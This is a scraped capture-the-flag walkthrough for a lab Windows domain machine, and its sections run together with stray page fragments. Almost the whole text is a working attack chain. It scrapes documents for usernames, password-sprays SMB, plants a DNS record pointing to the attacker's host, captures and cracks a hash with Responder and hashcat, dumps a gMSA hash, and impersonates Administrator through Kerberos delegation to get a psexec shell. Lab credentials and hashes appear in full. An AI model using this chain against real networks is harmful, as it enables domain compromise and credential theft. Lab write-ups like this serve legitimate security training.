#!/bin/bash
for month in {01..12}; do
for day in {01..31}; do
wget http://10.10.10.248/documents/2020-$month-$day-upload.pdf
done
done
exiftool 2020-* | grep -i creator | awk -F: '{print $2}' | sed 's/^[ \t]*//' | sort -u > users.txtfor i in $(ls 2020-*); do open $i; done
Add a dns A record
Got a call back
Last updated
Was this helpful?
Was this helpful?
NewIntelligenceCorpUser9876netexec smb 10.10.10.248 -u users.txt -p NewIntelligenceCorpUser9876 --continue-on-successTiffany.Molina:NewIntelligenceCorpUser9876netexec smb 10.10.10.248 -u Tiffany.Molina -p NewIntelligenceCorpUser9876 --sharesadot@kali:~/oscp/htb/windows/intelligence$ smbclient "\\\\10.10.10.248\\Users" -U Tiffany.Molina%NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sun Apr 18 20:20:26 2021
.. DR 0 Sun Apr 18 20:20:26 2021
Administrator D 0 Sun Apr 18 19:18:39 2021
All Users DHSrn 0 Sat Sep 15 02:21:46 2018
Default DHR 0 Sun Apr 18 21:17:40 2021
Default User DHSrn 0 Sat Sep 15 02:21:46 2018
desktop.ini AHS 174 Sat Sep 15 02:11:27 2018
Public DR 0 Sun Apr 18 19:18:39 2021
Ted.Graves D 0 Sun Apr 18 20:20:26 2021
Tiffany.Molina D 0 Sun Apr 18 19:51:46 2021
3770367 blocks of size 4096. 1418574 blocks available
smb: \> prompt off
smb: \> recurse on
smb: \> mget *$ smbclient "\\\\10.10.10.248\\IT" -U Tiffany.Molina%NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Apr 18 19:50:55 2021
.. D 0 Sun Apr 18 19:50:55 2021
downdetector.ps1 A 1046 Sun Apr 18 19:50:55 2021
3770367 blocks of size 4096. 1419262 blocks available
smb: \> mget downdetector.ps1
Get file downdetector.ps1? y
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (5.1 KiloBytes/sec) (average 5.1 KiloBytes/sec)
smb: \> exit��# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <[email protected]>' -To 'Ted Graves <[email protected]>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}
Ted.Gravesbloodhound-python -d intelligence.htb -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -ns 10.10.10.248 -c allpython dnstool.py -u 'intelligence.htb\tiffany.molina' -p NewIntelligenceCorpUser9876 -r webad0t8.intelligence.htb -a add -t A -d 10.10.14.6 10.10.10.248sudo responder -I tun0hashcat -m 5600 ted.hash ~/rockyou.txt -Opython gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htbnetexec smb 10.10.10.248 -u svc_int$ -H 51e4932f13712047027300f869d07ab6impacket-getST -spn http/dc.intelligence.htb -impersonate Administrator -u intelligence/svc_int$ -hashes 51e4932f13712047027300f869d07ab6:51e4932f13712047027300f869d07ab6etST.py -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$ -hashes 51e4932f13712047027300f869d07ab6:51e4932f13712047027300f869d07ab6export KRB5CCNAME=$(pwd)/Administrator.ccache
impacket-psexec -k -no-pass intelligence.htb/[email protected]